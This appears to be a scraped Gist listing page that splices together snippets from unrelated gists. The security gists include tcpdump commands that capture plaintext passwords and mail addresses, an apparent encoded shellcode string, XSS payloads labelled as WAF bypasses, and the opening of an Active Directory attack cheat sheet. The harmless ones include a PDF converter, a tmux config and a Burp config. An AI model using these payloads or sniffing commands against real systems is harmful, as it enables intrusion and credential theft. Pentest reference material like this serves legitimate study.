Capture SMTP Email
tcpdump -nn -l port 25 | grep -i 'MAIL FROM\|RCPT TO'
Extract HTTP Passwords in POST Requests
tcpdump -s 0 -A -n -l | egrep -i "POST /|pwd=|passwd=|password=|Host:"
Capture FTP Credentials and Commands
sharpicx
AysadKozanoglu
/ capture Passwords tcpdump.md
Created
February 12, 2019 13:33
get plain passwords with tcpdump
elevenchars
/ fridanotes.md
Last active
March 6, 2025 19:40
My notes on injecting a frida gadget into an apk
I figured that I would write down my findings somewhere since this is my first time using Frida. This won't cover installing frida, adb, apktool because these are well covered in other sources.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 5 c at 5 b at jut Yet At At At At At At At At At At At At Pt Pt jut jut jut jut Qt jut at 111 1 t t t t t t t t t t t t t t t t Pt Pt Pt Pt jut j j j j at Bet At j Qt Rt St j j j j at 4 Kt Qt Qt Rt St j j Pt j at 311 1 t t 321 1 111 1 Bet Bet At t Qt Yet u h a a a a Q X 4 y P Y I I I I I I I I I I I I I I I I I 7 Q Z j A X P 0 A 0 A k A A Q 2 A B 2 B B 0 B B A B X P 8 A B u J I 4 q Y P M I F 0 u 8 V O v O 3 C 5 8 U 8 T o P b b I 2 N l I i s R p q C K 9 y q N P d K z m m P A A X X X X X X X X X X X X X |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @vanshitmalhotra | Bypass AWS WAF -// | |
| Add "<!" (without quotes) before your payload and bypass that WAF. :) | |
| eg: <!<script>confirm(1)</script> | |
| @black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc | |
| <img sr%00c=x o%00nerror=((pro%00mpt(1)))> | |
| DotDefender WAF bypass by @0xInfection | |
| <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme |
sminez
/ get_ippsec_details.py
Last active
June 5, 2024 12:10
Find examples of pen testing methods and tools in videos by Ippsec (as of 22nd January 2020)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Script used to pull down the current video descriptions from ippsec's youtube channel. | |
| The raw output still has a few HTML tags that need to be manually removed and there | |
| also seem to be multiple duplicates of videos that have been removed in the output | |
| saved as ippsec-details.txt | |
| """ | |
| import re | |
| import sys |
HiCraigChen
/ app.py
Last active
February 9, 2023 13:39
Convert PDF to image using Python with pdf2image library
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from chalice import Chalice, Response | |
| from pdf2image import convert_from_bytes | |
| import os | |
| from io import BytesIO | |
| app = Chalice(app_name='pdf2image') | |
| @app.route('/') | |
| def index(): |
SuryaMaulana
/ README.txt
Created
October 4, 2019 09:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ | |
| ┇ A bug is never just a mistake. ┇ | |
| ┇ It represents something bigger. An error ┇ | |
| ┇ of thinking that makes you who you are. ┇ | |
| ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛ |
asadasivan
/ burp_defaults_combined.json
Created
February 14, 2020 22:18
Burp Default Configuration file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "project_options":{ | |
| "connections":{ | |
| "hostname_resolution":[], | |
| "out_of_scope_requests":{ | |
| "advanced_mode":false, | |
| "drop_all_out_of_scope":false, | |
| "exclude":[], | |
| "include":[], | |
| "scope_option":"suite" |
rhovelz
/ .tmux.conf
Created
February 23, 2020 12:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############################# | |
| ########## Bindings | |
| ############################# | |
| # Set the prefix to `ctrl + a` instead of `ctrl + b` | |
| unbind C-b | |
| set-option -g prefix C-a | |
| bind-key C-a send-prefix | |
| # Automatically set window title |
ssstonebraker
/ Active Directory Attacks.md
Last active
January 15, 2025 00:06
Active Directory Attacks #oscp
Note: I did not author this, i found it somehwere.
- Tools
- Most common paths to AD compromise
- [GPO - Pivoting with Local Admin